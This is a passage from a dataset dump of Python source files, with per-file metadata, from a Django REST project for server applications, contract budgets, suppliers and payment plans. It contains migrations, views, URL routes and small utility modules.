verbose_name='\\u9879\\u76ee\\u540d\\u79f0')),\n ('type', models.CharField(max_length=100, verbose_name='\\u9879\\u76ee\\u7c7b\\u578b')),\n ('department', models.CharField(max_length=100, verbose_name='\\u4e3b\\u529e\\u90e8\\u95e8')),\n ('investment', models.FloatField(default=0, verbose_name='\\u9879\\u76ee\\u6279\\u590d\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u9879\\u76ee\\u6279\\u590d\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u9879\\u76ee\\u6279\\u590d\\u7814\\u53d1\\u8d39\\u7528')),\n ('total', models.FloatField(default=0, verbose_name='\\u9879\\u76ee\\u6279\\u590d\\u603b\\u8d39\\u7528')),\n ('status', models.CharField(choices=[('\\u6267\\u884c\\u4e2d', '\\u6267\\u884c\\u4e2d'), ('\\u6267\\u884c\\u5b8c', '\\u6267\\u884c\\u5b8c'), ('\\u5df2\\u79fb\\u4ea4', '\\u5df2\\u79fb\\u4ea4')], default='\\u6267\\u884c\\u4e2d', max_length=10, verbose_name='\\u72b6\\u6001')),\n ('comment', models.CharField(blank=True, max_length=200, verbose_name='\\u5907\\u6ce8')),\n ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6dfb\\u52a0\\u65f6\\u95f4')),\n ('lastModified', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6700\\u540e\\u4fee\\u6539\\u65f6\\u95f4')),\n ],\n options={\n 'ordering': ('add_time',),\n 'verbose_name': '\\u9879\\u76ee\\u4fe1\\u606f',\n 'verbose_name_plural': '\\u9879\\u76ee\\u4fe1\\u606f',\n },\n ),\n migrations.AddField(\n model_name='budget',\n name='project',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contractBudget.Project', verbose_name='\\u6240\\u5c5e\\u9879\\u76ee'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4980884790420532,
"alphanum_fraction": 0.6013107299804688,
"avg_line_length": 48.486488342285156,
"blob_id": "d210987319a6c53a9438c8313cb6fe5ca6a3bea1",
"content_id": "fcf79c4a5e0a282d839557e5f63683354d435d63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1831,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 37,
"path": "/apps/contractBudget/migrations/0004_supplier.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-28 16:34\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0003_budget_total'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Supplier',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('supplierId', models.CharField(max_length=100, unique=True, verbose_name='\\u4f9b\\u5e94\\u5546\\u7f16\\u53f7')),\n ('accountName', models.CharField(max_length=100, verbose_name='\\u5f00\\u6237\\u540d\\u79f0')),\n ('bankMaster', models.CharField(max_length=50, verbose_name='\\u5f00\\u6237\\u94f6\\u884c')),\n ('bankBranch', models.CharField(max_length=50, verbose_name='\\u5f00\\u6237\\u652f\\u884c')),\n ('accountId', models.CharField(max_length=100, verbose_name='\\u94f6\\u884c\\u8d26\\u53f7')),\n ('accountAddr', models.CharField(max_length=100, verbose_name='\\u5f00\\u6237\\u6240\\u5728\\u5730')),\n ('contact', models.CharField(max_length=50, verbose_name='\\u8054\\u7cfb\\u4eba')),\n ('phone', models.CharField(max_length=50, verbose_name='\\u8054\\u7cfb\\u65b9\\u5f0f')),\n ('email', models.CharField(max_length=50, verbose_name='\\u7535\\u5b50\\u90ae\\u7bb1\\u5730\\u5740')),\n ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6dfb\\u52a0\\u65f6\\u95f4')),\n ],\n options={\n 'ordering': ('add_time',),\n 'verbose_name': '\\u4f9b\\u5e94\\u5546',\n 'verbose_name_plural': '\\u4f9b\\u5e94\\u5546',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.41564562916755676,
"alphanum_fraction": 0.6503298878669739,
"avg_line_length": 52.04999923706055,
"blob_id": "e6389ab59ef5aeeff194c9b80e75331d8e7defc5",
"content_id": "fcf39d730b0583baf58fdcdfcf415d3705e68340",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 648,
"num_lines": 20,
"path": "/apps/application/migrations/0021_auto_20170428_1107.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-04-28 11:07\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0020_auto_20170426_1613'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='serverapplication',\n name='status',\n field=models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d', '\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d'), ('\\u4f7f\\u7528\\u4e2d', '\\u4f7f\\u7528\\u4e2d'), ('\\u62d2\\u7edd', '\\u62d2\\u7edd'), ('\\u7533\\u8bf7\\u56de\\u6536\\u4e2d', '\\u7533\\u8bf7\\u56de\\u6536\\u4e2d'), ('\\u5ef6\\u671f\\u4e2d', '\\u5ef6\\u671f\\u4e2d'), ('\\u7533\\u8bf7\\u5ef6\\u671f\\u4e2d', '\\u7533\\u8bf7\\u5ef6\\u671f\\u4e2d'), ('\\u5df2\\u5230\\u671f', '\\u5df2\\u5230\\u671f'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536'), ('\\u90e8\\u5206\\u56de\\u6536', '\\u90e8\\u5206\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20),\n ),\n ]\n"
},
{
"alpha_fraction": 0.8421052694320679,
"alphanum_fraction": 0.8421052694320679,
"avg_line_length": 57,
"blob_id": "2d3eca57eed51259caa67fb37c5a5a0f45eca22d",
"content_id": "27aa4c1ba25dc9ac231ec3a0ade70284db5f1d49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 57,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 1,
"path": "/apps/application/__init__.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "default_app_config = \"application.apps.ApplicationConfig\""
},
{
"alpha_fraction": 0.6227272748947144,
"alphanum_fraction": 0.6727272868156433,
"avg_line_length": 26.625,
"blob_id": "db8b6aa09d39205fffe9b04083ec2919fb17b37f",
"content_id": "848364b2e7afb0dec7d63c7a80919779f7baae8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 8,
"path": "/apps/users/forms.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/9 20:38'\nfrom django import forms\n\nclass LoginFrom(forms.Form):\n email = forms.EmailField(required=True)\n password = forms.CharField(required=True)"
},
{
"alpha_fraction": 0.7241379022598267,
"alphanum_fraction": 0.7413793206214905,
"avg_line_length": 28.125,
"blob_id": "ae0787c35c539554ebcbc6fc4964ffb4a579a49e",
"content_id": "6b243e261c7b8dd5891dacce738c4cd558418c0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 8,
"path": "/apps/administrator/models.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "#encoding: utf-8\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n# Create your models here.\n\nclass Script(models.Model):\n file = models.FileField(upload_to=\"scripts/%Y/%m\",verbose_name=\"上传路径\",max_length=100)"
},
{
"alpha_fraction": 0.733759343624115,
"alphanum_fraction": 0.7507987022399902,
"avg_line_length": 46,
"blob_id": "d0598e813262c1f0cb34691c455286486293eaf5",
"content_id": "11aa93488a01b96d691836ba0e423fab0e1b4fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 939,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 20,
"path": "/apps/administrator/urls.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/4/25 14:05'\nfrom django.conf.urls import url,include\nfrom django.views.generic import TemplateView\nimport xadmin\nfrom django.views.static import serve\n\nfrom .views import LoginView,RootApplicationListView,ServerApplicationListView,EmailListView,FileUploaderView\nfrom application.views import RootApplicationDetailView,UsingApplicationDetailView\nurlpatterns = [\n url(r'^login/$',LoginView.as_view(),name=\"administratorLogin\"),\n url(r'^rootApplication/$',RootApplicationListView.as_view(),name=\"rootApplicationList\"),\n url(r'^rootApplication/(?P<pk>[0-9]+)$',RootApplicationDetailView.as_view()),\n url(r'^serverApplication/$',ServerApplicationListView.as_view()),\n url(r'^serverApplication/(?P<pk>[0-9]+)$',UsingApplicationDetailView.as_view()),\n url(r'^emailApplication/$',EmailListView.as_view()),\n url(r'^fileUploader/$',FileUploaderView.as_view())\n\n]"
},
{
"alpha_fraction": 0.521212100982666,
"alphanum_fraction": 0.6282828450202942,
"avg_line_length": 25.052631378173828,
"blob_id": "c37804cc96166cdd8bf8762148001ca2980077a1",
"content_id": "ebd3fd88c859cd447b74e466475ca69db3c2878a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 19,
"path": "/apps/serverApplication/migrations/0006_auto_20170227_1555.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-27 15:55\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0005_auto_20170227_1554'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='environment',\n options={'verbose_name': '\\u73af\\u5883\\u7c7b\\u522b', 'verbose_name_plural': '\\u73af\\u5883\\u7c7b\\u522b'},\n ),\n ]\n"
},
{
"alpha_fraction": 0.6077170372009277,
"alphanum_fraction": 0.6688103079795837,
"avg_line_length": 24.66666603088379,
"blob_id": "fad3b745392c7b4f4341596c282627542f8c958b",
"content_id": "400982221f10a9dd59d2e39e4c41baa4dbbb23bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 12,
"path": "/apps/utils/findDate.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/3/6 15:59'\n\nimport datetime\n\n\ndaysMap = [30,90,180,datetime.date.today().year,0]\ndef getDays(conditionTime):\n return daysMap[int(conditionTime)]\ndef getDate(days):\n return (datetime.datetime.now() - datetime.timedelta(days=days)).date()\n\n\n\n"
},
{
"alpha_fraction": 0.5343227982521057,
"alphanum_fraction": 0.6270871758460999,
"avg_line_length": 25.950000762939453,
"blob_id": "a9f13d44a601d4c233d1089bc27a5618b15be619",
"content_id": "92a37aa36f919e10eb585204322afb21e6921eed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 20,
"path": "/apps/contractBudget/migrations/0002_auto_20170327_1633.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-27 16:33\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='project',\n name='department',\n field=models.CharField(default='\\u6280\\u672f\\u5f00\\u53d1\\u4e2d\\u5fc3', max_length=100, verbose_name='\\u4e3b\\u529e\\u90e8\\u95e8'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.8150943517684937,
"avg_line_length": 43.33333206176758,
"blob_id": "021f2f2aa2f7e477ccfe70e86f79431f038943f9",
"content_id": "dde72d25ae8a8b4a99024ec6547507b2467fef1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 6,
"path": "/media/scripts/2017/04/functional_tests.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nbinary = FirefoxBinary(r'E:\\浏览器\\firefox.exe')\nbrowser = webdriver.Firefox(firefox_binary=binary)\nbrowser.get('http://localhost:8000')\nassert 'Django' in browser.title"
},
{
"alpha_fraction": 0.6508589386940002,
"alphanum_fraction": 0.6566658616065979,
"avg_line_length": 35.90178680419922,
"blob_id": "a9ef78e0b4b72f9d9b47147f4d9758d2094e5827",
"content_id": "f86e503f9baaa14f2a9e935e99c34f0c132e7d03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4133,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 112,
"path": "/apps/serverApplication/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom django.db.models import Q\nfrom rest_framework import generics\nfrom .models import Application, Os, Environment, Source\nfrom .serializer import ApplicationSerializer, OsSerializer, EnvironmentSerializer,SourceSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n# import redis\n# import msgpack\n\n\n# redisClient = redis.StrictRedis(host='localhost', port=6379)\n\n# def settingsFactory(name):\n#\n# querySet = redisClient.hgetall(name)\n# if querySet is not None:\n# result = msgpack.unpack(querySet)\n# return result\n# else:\n# if name == 'Os':\n# print 'os'\n# querySet = Os.objects.all()\n# serializer = OsSerializer(querySet,many=True)\n# elif name == 'Source':\n# querySet = Source.objects.all()\n# serializer = SourceSerializer(querySet,many=True)\n# else:\n# querySet = Environment.objects.all()\n# serializer = EnvironmentSerializer(querySet,many=True)\n#\n# # redisClient.set(name,querySet)\n#\n# redisClient.hmset(name,querySet)\n# return querySet\n# Create your views here.\nclass Pagination(LimitOffsetPagination):\n default_limit = 10\n limit_query_param = \"limit\"\n offset_query_param = \"offset\"\n max_limit = None\n\nclass ApplicationListView(generics.ListCreateAPIView):\n queryset = Application.objects.all()\n pagination_class = Pagination\n serializer_class = ApplicationSerializer\n\n def get_queryset(self):\n queryset = Application.objects.all()\n username = self.request.query_params.get('username', None)\n received = self.request.query_params.get('received', None)\n ip = self.request.query_params.get('ip', None)\n team = self.request.query_params.get('team', None)\n source = self.request.query_params.get('source', None)\n os = self.request.query_params.get('os', None)\n aQ = Q()\n if username is not None:\n aQ.add(Q(username__startswith=username), Q.AND)\n if received is not None:\n aQ.add(Q(received__startswith=received), Q.AND)\n if ip is not None:\n aQ.add(Q(ip__startswith=ip), Q.AND)\n if team is not None:\n aQ.add(Q(team__startswith=team), Q.AND)\n if source is not None:\n aQ.add(Q(source__startswith=source), Q.AND)\n if os is not None:\n aQ.add(Q(os__startswith=os), Q.AND)\n queryset = queryset.filter(aQ)\n return queryset\n\nclass OsListView(APIView):\n def get(self,request):\n os = Os.objects.all()\n # os = settingsFactory('Os')\n serializer = OsSerializer(os,many=True)\n return Response(serializer.data)\n def post(self,request):\n serializer = OsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\nclass EnvironmentView(APIView):\n def get(self,request):\n environment = Environment.objects.all()\n serializer = EnvironmentSerializer(environment,many=True)\n return Response(serializer.data)\n\n def post(self,request):\n serializer = EnvironmentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\nclass SourceListView(APIView):\n def get(self,request):\n source = Source.objects.all()\n serializer = SourceSerializer(source,many=True)\n return Response(serializer.data)\n\n def post(self,request):\n serializer = SourceSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n 
return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n"
},
{
"alpha_fraction": 0.4173845052719116,
"alphanum_fraction": 0.5974941253662109,
"avg_line_length": 46.296295166015625,
"blob_id": "2201f41946a7ef373f61e79b8f1d4fe5a51f57f1",
"content_id": "88110bba7dfd325f8561c163f2a31346c72b7074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1277,
"license_type": "no_license",
"max_line_length": 554,
"num_lines": 27,
"path": "/apps/application/migrations/0010_order.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-01 17:00\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0009_auto_20170228_1831'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('orderId', models.CharField(max_length=200)),\n ('status', models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d', '\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d'), ('\\u5206\\u914d\\u5b8c\\u6210', '\\u5206\\u914d\\u5b8c\\u6210'), ('\\u62d2\\u7edd', '\\u62d2\\u7edd'), ('\\u56de\\u6536\\u7533\\u8bf7\\u4e2d', '\\u56de\\u6536\\u7533\\u8bf7\\u4e2d'), ('\\u5ef6\\u671f\\u4e2d', '\\u5ef6\\u671f\\u4e2d'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536'), ('\\u90e8\\u5206\\u56de\\u6536', '\\u90e8\\u5206\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20)),\n ],\n options={\n 'verbose_name': '\\u8ba2\\u5355',\n 'verbose_name_plural': '\\u8ba2\\u5355',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.6290726661682129,
"alphanum_fraction": 0.6817042827606201,
"avg_line_length": 27.5,
"blob_id": "4f6a4807003da7820bca6ea3185cc1399492173f",
"content_id": "992af898e4d3a7b5998f2472ddbb491931e79ec8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 14,
"path": "/apps/utils/redisHandler.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/3/10 11:28'\n\nimport redis\n\nclass RedisPool:\n def getRedis(self,ClientHost=\"localhost\",ClientPort=6379,ClientDb=0):\n pool = redis.ConnectionPool(host=ClientHost,port=ClientPort,db=ClientDb)\n return redis.StrictRedis(connection_pool=pool)\n\ndef main():\n Pool = RedisPool()\n redis = Pool.getRedis(\"localhost\",6379)\n"
},
{
"alpha_fraction": 0.6326530575752258,
"alphanum_fraction": 0.6632652878761292,
"avg_line_length": 27.071428298950195,
"blob_id": "d9ec8ddedbb42fc1ef018478dee554039a5b3dac",
"content_id": "ac2e65829dbd1ae62d2222e34326b98d6a89e7a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 400,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 14,
"path": "/apps/utils/email_send.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/22 14:31'\n\nfrom django.core.mail import send_mail\nfrom SspApi.settings import EMAIL_FROM\n\ndef send_email(email,content,send_type=\"root权限申请\"):\n email_title = send_type\n email_body = content\n email = email.split(\";\")\n send_status = send_mail(email_title,email_body,EMAIL_FROM,email)\n if send_status:\n pass"
},
{
"alpha_fraction": 0.651461124420166,
"alphanum_fraction": 0.6573604345321655,
"avg_line_length": 37.56349182128906,
"blob_id": "fb53e93eec5e282111c3a2bb636d83d4fc78f0ee",
"content_id": "aa95ec4f2fda64f1c114b58dc2516e23666235d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14584,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 378,
"path": "/apps/contractBudget/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nfrom django.shortcuts import render\n\nfrom datetime import date\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework import generics\nfrom django.db.models import Q\nfrom django.http import Http404\nfrom rest_framework.decorators import api_view\nimport datetime\n\nfrom .models import Project, Budget, Supplier, Contract, PaymentPlan, PaymentRecord\nfrom .serializer import ProjectSerizlizer, BudgetSerializer, SupplierSerializer, \\\n ContractSerializer, PaymentPlanSerializer, PaymentRecordSerializer\n\n\n# Create your views here.\n\n\nclass Pagination(LimitOffsetPagination):\n default_limit = 20\n limit_query_param = \"limit\"\n offset_query_param = \"offset\"\n max_limit = None\n\n\nclass ProjectListView(generics.ListCreateAPIView):\n queryset = Project.objects.all()\n pagination_class = Pagination\n serializer_class = ProjectSerizlizer\n\n def get_queryset(self):\n queryset = Project.objects.all()\n condition = self.request.query_params.get(\"condition\", \"\")\n if condition == \"\":\n return queryset\n else:\n aQ = Q()\n aQ.add(Q(projectId__startswith=condition) | Q(name__startswith=condition), Q.AND)\n queryset = queryset.filter(aQ)\n return queryset\n\n def post(self, request, *args, **kwargs):\n serializer = ProjectSerizlizer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProjectDetailView(APIView):\n def get_object(self, pk):\n try:\n return Project.objects.get(pk=pk)\n except Project.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n project = self.get_object(pk)\n serializer = ProjectSerizlizer(project)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n project = self.get_object(pk)\n serializer = ProjectSerizlizer(project, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass BudgetListView(APIView):\n def get(self, request, format=None):\n projectId = request.query_params.get(\"projectId\", None)\n if projectId is None:\n budgets = Budget.objects.all()\n else:\n project = Project.objects.get(projectId=projectId)\n budgets = project.budget_set.all()\n serializer = BudgetSerializer(budgets, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n projectId = request.data.get(\"projectId\")\n year = request.data.get(\"year\")\n investment = float(request.data.get(\"investment\"))\n maintain = float(request.data.get(\"maintain\"))\n development = float(request.data.get(\"development\"))\n total = float(request.data.get(\"total\"))\n project = Project.objects.get(projectId=projectId)\n budget = Budget(project=project, year=year, investment=investment, maintain=maintain, development=development,\n total=total)\n budget.save()\n return Response({\"budget\": budget.__str__()}, status=status.HTTP_201_CREATED)\n # return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\n\nclass BudgetDetailView(APIView):\n def get_object(self, pk):\n try:\n return Budget.objects.get(pk=pk)\n except Budget.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n Budget = self.get_object(pk)\n serializer = 
BudgetSerializer(Budget)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n budget = self.get_object(pk)\n serializer = BudgetSerializer(budget, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n budget = self.get_object(pk)\n budget.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass SupplierListView(generics.ListCreateAPIView):\n queryset = Supplier.objects.all()\n pagination_class = Pagination\n serializer_class = SupplierSerializer\n\n def get_queryset(self):\n # optionally narrow the list by the supplierId query parameter\n queryset = Supplier.objects.all()\n supplierId = self.request.query_params.get(\"supplierId\", None)\n aQ = Q()\n if supplierId is None:\n return queryset\n if supplierId != \"\":\n aQ.add(Q(supplierId=supplierId), Q.AND)\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n\nclass SupplierDetailView(APIView):\n def get_object(self, pk):\n try:\n return Supplier.objects.get(pk=pk)\n except Supplier.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n supplier = self.get_object(pk)\n serializer = SupplierSerializer(supplier)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n supplier = self.get_object(pk)\n serializer = SupplierSerializer(supplier, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n supplier = self.get_object(pk)\n supplier.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass ContractListView(generics.ListCreateAPIView):\n queryset = Contract.objects.all()\n pagination_class = Pagination\n serializer_class = ContractSerializer\n\n def get_queryset(self):\n queryset = Contract.objects.all()\n projectId = self.request.query_params.get(\"projectId\", None)\n aQ = Q()\n if projectId is None:\n return queryset\n if projectId != \"\":\n project = Project.objects.get(projectId=projectId)\n aQ.add(Q(project=project.id), Q.AND)\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n def post(self, request, format=None):\n projectId = request.data.get(\"projectId\")\n project = Project.objects.get(projectId=projectId)\n contractId = request.data.get(\"contractId\")\n lawId = request.data.get(\"lawId\")\n contractStatus = request.data.get(\"status\")\n supplierId = request.data.get(\"supplierId\")\n # copy the supplier's bank details onto the new contract\n supplier = Supplier.objects.get(supplierId=supplierId)\n accountName = supplier.accountName\n bankMaster = supplier.bankMaster\n investment = float(request.data.get(\"investment\"))\n maintain = float(request.data.get(\"maintain\"))\n development = float(request.data.get(\"development\"))\n total = float(request.data.get(\"total\"))\n signDate = request.data.get(\"signDate\")\n subscriber = request.data.get(\"subscriber\")\n handlerPerson = request.data.get(\"handlerPerson\")\n comment = request.data.get(\"comment\")\n name = request.data.get(\"name\")\n contract = Contract(contractId=contractId, project=project, lawId=lawId, status=contractStatus, supplierId=supplierId,\n accountName=accountName, bankMaster=bankMaster, investment=investment, maintain=maintain,\n development=development, total=total, signDate=signDate, subscriber=subscriber,\n handlerPerson=handlerPerson,\n comment=comment, name=name)\n contract.save()\n return 
Response({\"contract\": contract.__str__()}, status=status.HTTP_201_CREATED)\n\n\nclass ContractDetailView(APIView):\n def get_object(self, pk):\n try:\n return Contract.objects.get(pk=pk)\n except Contract.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n contract = self.get_object(pk)\n serializer = ContractSerializer(contract)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n contract = self.get_object(pk)\n serializer = ContractSerializer(contract, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n contract = self.get_object(pk)\n contract.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass PaymentPlanListView(APIView):\n def get(self, request, format=None):\n contractId = request.query_params.get(\"contractId\", None)\n if contractId is None:\n payments = PaymentPlan.objects.all()\n else:\n contract = Contract.objects.get(contractId=contractId)\n payments = PaymentPlan.objects.filter(contract=contract.id)\n serializer = PaymentPlanSerializer(payments, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n contractId = request.data.get(\"contractId\")\n # Contract.objects.get raises DoesNotExist rather than returning None, so catch it explicitly\n try:\n contract = Contract.objects.get(contractId=contractId)\n except Contract.DoesNotExist:\n return Response({\"msg\": \"contract不存在\"}, status=status.HTTP_400_BAD_REQUEST)\n paymentTime = request.data.get(\"paymentTime\")\n numOfPayments = int(request.data.get(\"numOfPayments\"))\n ratioOfPayments = request.data.get(\"ratioOfPayments\")\n investment = float(request.data.get(\"investment\"))\n maintain = float(request.data.get(\"maintain\"))\n development = float(request.data.get(\"development\"))\n total = float(request.data.get(\"total\"))\n items = request.data.get(\"items\")\n paymentPlan = PaymentPlan(contract=contract, numOfPayments=numOfPayments, ratioOfPayments=ratioOfPayments,\n investment=investment, maintain=maintain, development=development, total=total,\n paymentTime=paymentTime, items=items)\n paymentPlan.save()\n return Response({\"msg\": \"success\"}, status=status.HTTP_201_CREATED)\n\n\nclass PaymentPlanDetailView(APIView):\n def get_object(self, 